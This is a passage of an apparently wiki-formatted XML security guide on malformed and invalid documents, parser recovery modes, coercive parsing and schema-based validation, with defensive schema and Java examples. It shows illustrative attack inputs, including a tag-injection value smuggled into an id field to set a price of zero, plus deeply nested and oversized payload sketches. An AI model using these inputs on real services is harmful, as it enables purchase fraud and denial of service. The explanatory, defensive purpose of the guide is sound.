A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
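&lt;br /&gt;
As a minimal sketch of what a stricter definition could look like, the following XML Schema fragment constrains both elements of the previous document. The limits shown (a &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; of 1 to 100 characters and an &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; between 0 and 150) are illustrative assumptions, not values taken from any specification, and should be adapted to the application:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:minLength value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxLength value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Under these assumed limits, a validating parser would reject the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; because it exceeds the &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; bound, which is a constraint the DTD cannot express.&lt;br /&gt;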
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was validated by application code rather than against the proposed sample schema. &lt;br /&gt;
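&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, XML Schema provides the built-in type &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;, so the value does not need to be declared as a string and then restricted. The following is a minimal sketch, assuming a hypothetical element named &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; that must carry exactly 32 octets (for &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt;, the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets, not characters):&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;32&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;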
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative total on the user’s account. To avoid this logic vulnerability, declare the element as &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML Schema offers data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, setting the price to Infinity or NaN will not trigger errors in the application, because the schema rejects those values as invalid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
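&lt;br /&gt;
An application that cannot rely on schema validation could apply the same whitelist itself. This is a minimal Java sketch under that assumption; the class &amp;lt;tt&amp;gt;MonthWhitelist&amp;lt;/tt&amp;gt; and its method are hypothetical names, and the list simply mirrors the enumeration values above:&lt;br /&gt;

```java
import java.util.Arrays;

final class MonthWhitelist {
    // Hypothetical mirror of the enumeration values used in the schema.
    private static final String[] MONTHS = {
        "January", "February", "March", "April", "May", "June",
        "July", "August", "September", "October", "November", "December"
    };

    // Exact, case-sensitive match against the fixed list; null is rejected.
    static boolean isAllowed(String value) {
        return Arrays.asList(MONTHS).contains(value);
    }

    public static void main(String[] args) {
        System.out.println(isAllowed("March"));   // true
        System.out.println(isAllowed("Smarch"));  // false
    }
}
```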
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where valid values must have one exact length (let's say 8), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; restriction can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
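&lt;br /&gt;
The length restrictions above can be approximated in application code. The sketch below is illustrative only, with hypothetical names; it counts Unicode code points rather than UTF-16 units, on the assumption that this is closer to how a schema processor counts characters:&lt;br /&gt;

```java
final class NameLength {
    // True when the number of characters lies between min and max, inclusive.
    static boolean hasLengthBetween(String value, int min, int max) {
        // Count code points so a character outside the BMP counts once.
        int length = value.codePointCount(0, value.length());
        if (length > max) {
            return false;
        }
        return length >= min;
    }

    public static void main(String[] args) {
        System.out.println(hasLengthBetween("Al", 3, 256));     // false
        System.out.println(hasLengthBetween("Alice", 3, 256));  // true
    }
}
```

Passing the same number as minimum and maximum gives the exact-length check.&lt;br /&gt;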
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
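&lt;br /&gt;
The same expression can be reused outside the schema. This is a minimal Java sketch with hypothetical class and method names; it relies on &amp;lt;tt&amp;gt;Matcher.matches()&amp;lt;/tt&amp;gt;, which has to match the whole input in the same way a schema pattern does:&lt;br /&gt;

```java
import java.util.regex.Pattern;

final class SsnPattern {
    // Same expression as the pattern restriction in the schema above.
    private static final Pattern SSN = Pattern.compile("[0-9]{3}-[0-9]{2}-[0-9]{4}");

    static boolean isValid(String candidate) {
        if (candidate == null) {
            return false;
        }
        // matches() requires the entire string to fit the pattern.
        return SSN.matcher(candidate).matches();
    }

    public static void main(String[] args) {
        System.out.println(isValid("123-45-6789"));  // true
        System.out.println(isValid("123456789"));    // false
    }
}
```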
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
